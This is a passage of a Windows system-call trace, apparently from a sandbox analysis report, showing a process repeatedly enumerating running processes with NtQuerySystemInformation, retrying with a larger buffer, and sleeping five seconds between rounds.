Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.006] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.016] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.025] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.034] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.043] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.059] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.068] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.086] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.095] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.103] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.113] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.122] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.149] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.158] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.167] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.178] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.187] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 